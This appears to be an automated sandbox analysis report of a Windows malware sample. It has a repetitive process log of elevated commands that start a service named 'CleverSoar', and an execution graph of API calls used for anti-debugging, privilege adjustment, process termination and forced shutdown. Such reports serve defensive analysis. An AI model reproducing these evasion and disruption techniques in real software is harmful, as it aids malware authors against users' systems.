                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:71
                      Start time:03:35:13
                      Start date:22/12/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c start sc start CleverSoar
                      Imagebase:0x7ff6563a0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:72
                      Start time:03:35:13
                      Start date:22/12/2024
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc start CleverSoar
                      Imagebase:0x7ff6a2270000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:73
                      Start time:03:35:13
                      Start date:22/12/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:74
                      Start time:03:35:13
                      Start date:22/12/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c start sc start CleverSoar
                      Imagebase:0x7ff6563a0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:75
                      Start time:03:35:13
                      Start date:22/12/2024
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc start CleverSoar
                      Imagebase:0x7ff6a2270000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:76
                      Start time:03:35:13
                      Start date:22/12/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:77
                      Start time:03:35:13
                      Start date:22/12/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c start sc start CleverSoar
                      Imagebase:0x7ff6563a0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:78
                      Start time:03:35:13
                      Start date:22/12/2024
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc start CleverSoar
                      Imagebase:0x7ff6a2270000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:79
                      Start time:03:35:13
                      Start date:22/12/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:80
                      Start time:03:35:13
                      Start date:22/12/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c start sc start CleverSoar
                      Imagebase:0x7ff6563a0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:81
                      Start time:03:35:13
                      Start date:22/12/2024
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc start CleverSoar
                      Imagebase:0x7ff6a2270000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:82
                      Start time:03:35:13
                      Start date:22/12/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:83
                      Start time:03:35:13
                      Start date:22/12/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c start sc start CleverSoar
                      Imagebase:0x7ff6563a0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:84
                      Start time:03:35:13
                      Start date:22/12/2024
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc start CleverSoar
                      Imagebase:0x7ff6a2270000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:85
                      Start time:03:35:13
                      Start date:22/12/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:86
                      Start time:03:35:13
                      Start date:22/12/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c start sc start CleverSoar
                      Imagebase:0x7ff6563a0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:87
                      Start time:03:35:13
                      Start date:22/12/2024
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc start CleverSoar
                      Imagebase:0x7ff6a2270000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:88
                      Start time:03:35:13
                      Start date:22/12/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:89
                      Start time:03:35:14
                      Start date:22/12/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c start sc start CleverSoar
                      Imagebase:0x7ff6563a0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:90
                      Start time:03:35:14
                      Start date:22/12/2024
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc start CleverSoar
                      Imagebase:0x7ff6a2270000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:91
                      Start time:03:35:14
                      Start date:22/12/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:92
                      Start time:03:35:14
                      Start date:22/12/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c start sc start CleverSoar
                      Imagebase:0x7ff6563a0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:93
                      Start time:03:35:14
                      Start date:22/12/2024
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc start CleverSoar
                      Imagebase:0x7ff6a2270000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:94
                      Start time:03:35:14
                      Start date:22/12/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:95
                      Start time:03:35:14
                      Start date:22/12/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c start sc start CleverSoar
                      Imagebase:0x7ff6563a0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:96
                      Start time:03:35:14
                      Start date:22/12/2024
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc start CleverSoar
                      Imagebase:0x7ff6a2270000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:97
                      Start time:03:35:14
                      Start date:22/12/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:98
                      Start time:03:35:14
                      Start date:22/12/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c start sc start CleverSoar
                      Imagebase:0x7ff6563a0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:99
                      Start time:03:35:14
                      Start date:22/12/2024
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc start CleverSoar
                      Imagebase:0x7ff6a2270000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:100
                      Start time:03:35:14
                      Start date:22/12/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:101
                      Start time:03:35:14
                      Start date:22/12/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c start sc start CleverSoar
                      Imagebase:0x7ff6563a0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:102
                      Start time:03:35:14
                      Start date:22/12/2024
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc start CleverSoar
                      Imagebase:0x7ff6a2270000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:103
                      Start time:03:35:14
                      Start date:22/12/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:104
                      Start time:03:35:14
                      Start date:22/12/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c start sc start CleverSoar
                      Imagebase:0x7ff6563a0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:105
                      Start time:03:35:14
                      Start date:22/12/2024
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc start CleverSoar
                      Imagebase:0x7ff6a2270000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:106
                      Start time:03:35:14
                      Start date:22/12/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:107
                      Start time:03:35:14
                      Start date:22/12/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c start sc start CleverSoar
                      Imagebase:0x7ff6563a0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:108
                      Start time:03:35:14
                      Start date:22/12/2024
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc start CleverSoar
                      Imagebase:0x7ff6a2270000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:109
                      Start time:03:35:15
                      Start date:22/12/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:110
                      Start time:03:35:15
                      Start date:22/12/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c start sc start CleverSoar
                      Imagebase:0x7ff6563a0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Reset < >

                        Execution Graph

                        Execution Coverage:1.9%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:4.9%
                        Total number of Nodes:729
                        Total number of Limit Nodes:9
                        execution_graph 62875 6ca7b8f3 62876 6ca7b905 __dosmaperr 62875->62876 62877 6ca7b91d 62875->62877 62877->62876 62878 6ca7b997 62877->62878 62880 6ca7b968 __dosmaperr 62877->62880 62881 6ca7b9b0 62878->62881 62882 6ca7ba07 __wsopen_s 62878->62882 62883 6ca7b9cb __dosmaperr 62878->62883 62922 6ca6ef40 18 API calls __Getctype 62880->62922 62881->62883 62903 6ca7b9b5 62881->62903 62916 6ca735db HeapFree GetLastError _free 62882->62916 62915 6ca6ef40 18 API calls __Getctype 62883->62915 62886 6ca7bb5e 62889 6ca7bbd4 62886->62889 62892 6ca7bb77 GetConsoleMode 62886->62892 62887 6ca7ba27 62917 6ca735db HeapFree GetLastError _free 62887->62917 62891 6ca7bbd8 ReadFile 62889->62891 62894 6ca7bbf2 62891->62894 62895 6ca7bc4c GetLastError 62891->62895 62892->62889 62896 6ca7bb88 62892->62896 62893 6ca7ba2e 62901 6ca7b9e2 __dosmaperr __wsopen_s 62893->62901 62918 6ca79a89 20 API calls __wsopen_s 62893->62918 62894->62895 62899 6ca7bbc9 62894->62899 62895->62901 62896->62891 62897 6ca7bb8e ReadConsoleW 62896->62897 62898 6ca7bbaa GetLastError 62897->62898 62897->62899 62898->62901 62899->62901 62904 6ca7bc17 62899->62904 62905 6ca7bc2e 62899->62905 62919 6ca735db HeapFree GetLastError _free 62901->62919 62910 6ca80805 62903->62910 62920 6ca7bd1e 23 API calls 3 library calls 62904->62920 62905->62901 62907 6ca7bc45 62905->62907 62921 6ca7bfd6 21 API calls __wsopen_s 62907->62921 62909 6ca7bc4a 62909->62901 62912 6ca80812 62910->62912 62913 6ca8081f 62910->62913 62911 6ca8082b 62911->62886 62912->62886 62913->62911 62923 6ca6ef40 18 API calls __Getctype 62913->62923 62915->62901 62916->62887 62917->62893 62918->62903 62919->62876 62920->62901 62921->62909 62922->62876 62923->62912 62924 6ca6dd5f 62925 6ca6dd6b __wsopen_s 62924->62925 62926 6ca6dd72 GetLastError ExitThread 62925->62926 62927 6ca6dd7f 62925->62927 62936 6ca737d2 GetLastError 62927->62936 62932 6ca6dd9b 62969 6ca6dcca 16 API calls 2 library calls 62932->62969 62935 6ca6ddbd 62937 6ca737ef 62936->62937 62938 6ca737e9 62936->62938 62942 6ca737f5 SetLastError 62937->62942 62971 6ca75982 6 API calls std::_Lockit::_Lockit 62937->62971 62970 6ca75943 6 API calls std::_Lockit::_Lockit 62938->62970 62941 6ca7380d 62941->62942 62943 6ca73811 62941->62943 62947 6ca6dd84 62942->62947 62948 6ca73889 62942->62948 62972 6ca76005 EnterCriticalSection LeaveCriticalSection HeapAlloc __Getctype std::_Facet_Register 62943->62972 62946 6ca7381d 62949 6ca73825 62946->62949 62950 6ca7383c 62946->62950 62963 6ca78b86 62947->62963 62978 6ca6f8e9 37 API calls std::locale::_Setgloballocale 62948->62978 62973 6ca75982 6 API calls std::_Lockit::_Lockit 62949->62973 62975 6ca75982 6 API calls std::_Lockit::_Lockit 62950->62975 62954 6ca73833 62974 6ca735db HeapFree GetLastError _free 62954->62974 62956 6ca73848 62957 6ca7385d 62956->62957 62958 6ca7384c 62956->62958 62977 6ca735db HeapFree GetLastError _free 62957->62977 62976 6ca75982 6 API calls std::_Lockit::_Lockit 62958->62976 62961 6ca73839 62961->62942 62964 6ca6dd8f 62963->62964 62965 6ca78b98 GetPEB 62963->62965 62964->62932 62968 6ca75b8f 5 API calls std::_Lockit::_Lockit 62964->62968 62965->62964 62966 6ca78bab 62965->62966 62979 6ca75c38 5 API calls std::_Lockit::_Lockit 62966->62979 62968->62932 62969->62935 62970->62937 62971->62941 62972->62946 62973->62954 62974->62961 62975->62956 62976->62954 62977->62961 62979->62964 62980 6c8ff8a3 62982 6c8ff887 62980->62982 62981 6c9002ac GetCurrentProcess TerminateProcess 62983 6c9002ca 62981->62983 62982->62981 62984 6c8e3d62 62987 6c8e3bc0 62984->62987 62985 6c8e3e8a GetCurrentThread NtSetInformationThread 62986 6c8e3eea 62985->62986 62987->62985 62988 6c8e4b53 63146 6ca65863 62988->63146 62990 6c8e4b5c _Yarn 63160 6ca598b0 62990->63160 62992 6c90639e 63252 6ca6ef50 18 API calls __Getctype 62992->63252 62994 6c8e4cff 62995 6c8e5164 CreateFileA CloseHandle 63000 6c8e51ec 62995->63000 62996 6c8e4bae std::ios_base::_Ios_base_dtor 62996->62992 62996->62994 62996->62995 62997 6c8f245a _Yarn _strlen 62996->62997 62997->62992 62998 6ca598b0 FindFirstFileA 62997->62998 63003 6c8f2a83 std::ios_base::_Ios_base_dtor 62998->63003 63164 6ca63f30 OpenSCManagerA 63000->63164 63002 6c8efc00 63244 6ca64050 CreateToolhelp32Snapshot 63002->63244 63003->62992 63168 6ca4eff0 63003->63168 63006 6ca65863 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 63010 6c8e5478 std::ios_base::_Ios_base_dtor _Yarn _strlen 63006->63010 63008 6c8f37d0 Sleep 63052 6c8f37e0 std::ios_base::_Ios_base_dtor _Yarn _strlen 63008->63052 63009 6ca598b0 FindFirstFileA 63009->63010 63010->62992 63010->63002 63010->63006 63010->63009 63016 6c906ba0 104 API calls 63010->63016 63017 6c906e60 32 API calls 63010->63017 63032 6c8e6722 63010->63032 63034 6c8e6162 63010->63034 63206 6c907090 63010->63206 63219 6c92e010 67 API calls 63010->63219 63011 6c9063b2 63253 6c8e15e0 18 API calls std::ios_base::_Ios_base_dtor 63011->63253 63012 6ca64050 4 API calls 63028 6c8f053a 63012->63028 63013 6ca64050 4 API calls 63037 6c8f12e2 63013->63037 63015 6c9064f8 63016->63010 63017->63010 63019 6c8f0abc 63019->62997 63019->63013 63021 6ca64050 4 API calls 63021->63019 63022 6c8effe3 63022->63012 63022->63019 63023 6c8f211c 63023->62997 63027 6c8f241a 63023->63027 63024 6ca64050 4 API calls 63042 6c8f1dd9 63024->63042 63025 6ca598b0 FindFirstFileA 63025->63052 63029 6ca4eff0 11 API calls 63027->63029 63028->63019 63028->63021 63030 6c8f244d 63029->63030 63250 6ca64b80 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 63030->63250 63220 6ca60900 25 API calls 4 library calls 63032->63220 63033 6c8f2452 Sleep 63033->62997 63035 6c8e740b 63221 6ca63e00 CreateProcessA 63035->63221 63037->63023 63037->63024 63045 6c8f16ac 63037->63045 63038 6ca64050 4 API calls 63038->63023 63041 6c907090 77 API calls 63041->63052 63042->63023 63042->63038 63044 6c8e775a _strlen 63044->62992 63046 6c8e7ba9 63044->63046 63047 6c8e7b92 63044->63047 63050 6c8e7b43 _Yarn 63044->63050 63049 6ca65863 std::_Facet_Register 4 API calls 63046->63049 63048 6ca65863 std::_Facet_Register 4 API calls 63047->63048 63048->63050 63049->63050 63051 6ca598b0 FindFirstFileA 63050->63051 63060 6c8e7be7 std::ios_base::_Ios_base_dtor 63051->63060 63052->62992 63052->63025 63052->63041 63177 6c906ba0 63052->63177 63196 6c906e60 63052->63196 63251 6c92e010 67 API calls 63052->63251 63053 6ca63e00 4 API calls 63064 6c8e8a07 63053->63064 63054 6c8e9d7f 63057 6ca65863 std::_Facet_Register 4 API calls 63054->63057 63055 6c8e9d68 63056 6ca65863 std::_Facet_Register 4 API calls 63055->63056 63058 6c8e9d18 _Yarn 63056->63058 63057->63058 63059 6ca598b0 FindFirstFileA 63058->63059 63069 6c8e9dbd std::ios_base::_Ios_base_dtor 63059->63069 63060->62992 63060->63053 63061 6c8e962c _strlen 63060->63061 63062 6c8e8387 63060->63062 63061->62992 63061->63054 63061->63055 63061->63058 63063 6ca63e00 4 API calls 63072 6c8e9120 63063->63072 63064->63063 63065 6ca63e00 4 API calls 63082 6c8ea215 _strlen 63065->63082 63066 6ca63e00 4 API calls 63068 6c8e9624 63066->63068 63067 6ca65863 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 63073 6c8ee8b5 std::ios_base::_Ios_base_dtor _Yarn _strlen 63067->63073 63225 6ca64b80 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 63068->63225 63069->62992 63069->63065 63069->63073 63071 6ca598b0 FindFirstFileA 63071->63073 63072->63066 63073->62992 63073->63067 63073->63071 63074 6c8eed02 Sleep 63073->63074 63075 6c8ef7b1 63073->63075 63094 6c8ee8c1 63074->63094 63243 6ca64b80 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 63075->63243 63077 6c8ee8dd GetCurrentProcess TerminateProcess 63077->63073 63078 6c8ea9bb 63081 6ca65863 std::_Facet_Register 4 API calls 63078->63081 63079 6c8ea9a4 63080 6ca65863 std::_Facet_Register 4 API calls 63079->63080 63089 6c8ea953 _Yarn _strlen 63080->63089 63081->63089 63082->62992 63082->63078 63082->63079 63082->63089 63083 6ca63e00 4 API calls 63083->63094 63084 6c8efbb8 63085 6c8efbe8 ExitWindowsEx Sleep 63084->63085 63085->63002 63086 6c8ef7c0 63086->63084 63087 6c8eb009 63091 6ca65863 std::_Facet_Register 4 API calls 63087->63091 63088 6c8eaff0 63090 6ca65863 std::_Facet_Register 4 API calls 63088->63090 63089->63011 63089->63087 63089->63088 63092 6c8eafa0 _Yarn 63089->63092 63090->63092 63091->63092 63226 6ca64780 63092->63226 63094->63073 63094->63077 63094->63083 63095 6c8eb42c 63098 6ca65863 std::_Facet_Register 4 API calls 63095->63098 63096 6c8eb443 63099 6ca65863 std::_Facet_Register 4 API calls 63096->63099 63097 6c8eb059 std::ios_base::_Ios_base_dtor _strlen 63097->62992 63097->63095 63097->63096 63100 6c8eb3da _Yarn _strlen 63097->63100 63098->63100 63099->63100 63100->63011 63101 6c8eb79e 63100->63101 63102 6c8eb7b7 63100->63102 63105 6c8eb751 _Yarn 63100->63105 63103 6ca65863 std::_Facet_Register 4 API calls 63101->63103 63104 6ca65863 std::_Facet_Register 4 API calls 63102->63104 63103->63105 63104->63105 63106 6ca64780 104 API calls 63105->63106 63107 6c8eb804 std::ios_base::_Ios_base_dtor _strlen 63106->63107 63107->62992 63108 6c8ebc0f 63107->63108 63109 6c8ebc26 63107->63109 63112 6c8ebbbd _Yarn _strlen 63107->63112 63110 6ca65863 std::_Facet_Register 4 API calls 63108->63110 63111 6ca65863 std::_Facet_Register 4 API calls 63109->63111 63110->63112 63111->63112 63112->63011 63113 6c8ec08e 63112->63113 63114 6c8ec075 63112->63114 63117 6c8ec028 _Yarn 63112->63117 63116 6ca65863 std::_Facet_Register 4 API calls 63113->63116 63115 6ca65863 std::_Facet_Register 4 API calls 63114->63115 63115->63117 63116->63117 63118 6ca64780 104 API calls 63117->63118 63119 6c8ec0db std::ios_base::_Ios_base_dtor _strlen 63118->63119 63119->62992 63120 6c8ec7bc 63119->63120 63121 6c8ec7a5 63119->63121 63130 6c8ec753 _Yarn _strlen 63119->63130 63123 6ca65863 std::_Facet_Register 4 API calls 63120->63123 63122 6ca65863 std::_Facet_Register 4 API calls 63121->63122 63122->63130 63123->63130 63124 6c8ed3ed 63126 6ca65863 std::_Facet_Register 4 API calls 63124->63126 63125 6c8ed406 63127 6ca65863 std::_Facet_Register 4 API calls 63125->63127 63128 6c8ed39a _Yarn 63126->63128 63127->63128 63129 6ca64780 104 API calls 63128->63129 63131 6c8ed458 std::ios_base::_Ios_base_dtor _strlen 63129->63131 63130->63011 63130->63124 63130->63125 63130->63128 63136 6c8ecb2f 63130->63136 63131->62992 63132 6c8ed8bb 63131->63132 63133 6c8ed8a4 63131->63133 63137 6c8ed852 _Yarn _strlen 63131->63137 63135 6ca65863 std::_Facet_Register 4 API calls 63132->63135 63134 6ca65863 std::_Facet_Register 4 API calls 63133->63134 63134->63137 63135->63137 63137->63011 63138 6c8edccf 63137->63138 63139 6c8edcb6 63137->63139 63142 6c8edc69 _Yarn 63137->63142 63141 6ca65863 std::_Facet_Register 4 API calls 63138->63141 63140 6ca65863 std::_Facet_Register 4 API calls 63139->63140 63140->63142 63141->63142 63143 6ca64780 104 API calls 63142->63143 63145 6c8edd1c std::ios_base::_Ios_base_dtor 63143->63145 63144 6ca63e00 4 API calls 63144->63073 63145->62992 63145->63144 63148 6ca65868 63146->63148 63147 6ca65882 